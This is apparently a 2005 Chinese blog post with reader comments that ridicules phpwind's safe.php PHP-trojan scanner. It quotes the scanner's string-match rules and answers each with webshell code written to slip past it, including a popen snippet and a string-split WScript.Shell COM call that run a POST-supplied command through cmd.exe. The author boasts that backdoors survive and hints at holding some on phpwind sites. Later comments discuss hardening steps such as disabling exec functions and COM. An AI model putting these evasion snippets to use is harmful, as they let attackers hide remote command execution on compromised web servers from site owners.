phpwind开发的php木马查杀工具有何用?

看看phpwind官方的介绍!!我不得不好奇的来看看。道怎么比魔高了?

-----------------------------------------
服务器 php 木马, 恶意程序查杀工具(适用于1.3.6 与 2.0.1 版被攻击站点的安全检测)

使用后99%可以根除您空间上的恶意程序与 php木马程序
-----------------------------------------

哎,看来phpwind的开发人员在这方面有点愚笨,我来一句一句分析一下safe.php文件的核心。

1、strpos($a,'shell_exec')!==false
如果包含shell_exec,杀

我这样绕过:
-------------
system();
-------------
passthru();
-------------
exec();
-------------
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
-------------
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll') or die("PHP Create COM WSHSHELL failed");
$exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['command']."");
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;

2、strpos($a,'eval($_')!==false
如果包含eval($_,杀

我这样绕过:
eval($a);

3、strpos($a,'move_uploaded_file($_FILES')!==false
如果包含move_uploaded_file($_FILES,杀

我这样绕过:
move_uploaded_file($a,$b);

4、strpos($a,'copy($_FILES')!==false
如果包含copy($_FILES,杀

我这样绕过:
copy($a,$b);

完了!!就这样结束了!全部绕过了!后门继续留着。唉。真的不知道这个工具有什么用,骗骗菜鸟站长?为什么只能用在phpwind的站点?又怎么99%根除恶意程序了??

到我这里应该是99.999999%不能根除恶意程序!!!使用这个和不使用简直没分别。希望我手头没有各位PHPWIND站长的后门哦。不要以为有了这个safe.php就高枕无忧了。嘻嘻。道高一尺,魔绝对要高一丈的……改变不了的事实。

« 上一篇 | 下一篇 »

访客评论

帅哥!这个工具真的那么没用吗?
偶用PW2。02的!
有严重漏洞吗?
Post by imxh on 2005-04-24, 10:47 PM #1
PW没有严重漏洞.

这个工具有.呵呵
Post by angel on 2005-04-24, 11:31 PM #2
哎呀!我就是保留了几手没写.你居然又写出一个来了.
Post by angel on 2005-04-25, 3:39 PM #3
一点都看不懂!!

学习ing...........
Post by lingfeng on 2005-04-25, 6:26 PM #4
请问angel,屏蔽你的PHPSPY2006与系统关联部分的功能,按如下方法是否足够:
1,禁用system, shell_exec, exec, passthru, popen, ini_get, get_cfg_var, eval, phpinfo
2,启用安全模式
3,禁用COM类
Post by Diogin on 2005-04-26, 8:55 AM #5
不是这样赶尽杀绝吧?其实你最好再严格配置好相关的权限.让phpspy不能浏览当前站点以外的任何目录.这样phpspy就变成一个在线管理的工具.就被你染白了.
Post by angel on 2005-04-26, 4:01 PM #6
可以给出相关的服务配置文章参考吗?
譬如如何设置apache,使得不能浏览站点以外的任何目录?
再者,如果目录下有很多用户的站点,user1,user2,等文件夹,如何使得user1管理自己的user1的时候上传了phpspy后不能浏览其他用户站点的文件夹??
Post by terry on 2005-04-27, 4:34 AM #7
linux我是MO办法了.呵呵.完全不懂.
Post by angel on 2005-04-27, 5:39 AM #8
怎么换这个界面那么象weblog的~~~~~
Post by imxh on 2005-04-29, 12:53 AM #9
就是那个的模板.呵呵.仿造的.其实是pmachine
Post by angel on 2005-04-29, 1:15 AM #10
Total:22123Next ›

发表评论

评论内容 (必填):

My E-mail